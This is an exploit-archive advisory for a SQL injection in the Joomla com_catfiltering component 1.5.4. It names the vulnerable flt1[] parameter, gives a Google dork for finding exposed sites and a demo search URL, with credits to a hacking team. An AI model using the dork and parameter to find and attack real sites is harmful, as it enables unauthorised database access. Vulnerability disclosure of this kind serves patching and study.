######################
# Exploit Title : Joomla com_catfiltering - SQL Injection
# Exploit Author : Persian Hack Team
# Google Dork : inurl:index.php?option=com_catfiltering
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 1.5.4
# Date: 2016/06/14
######################
#
# PoC:
# flt1[]= Get Parameter Vulnerable To SQL
# Demo :
# http://server/index.php?flt1[]=0&flt2[]=0&flt3[]=0&flt4[]=58&flt5[]=0&option=com_catfiltering&task=search
# Youtube : https://www.youtube.com/watch?v=yM6TQAT3IeI
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################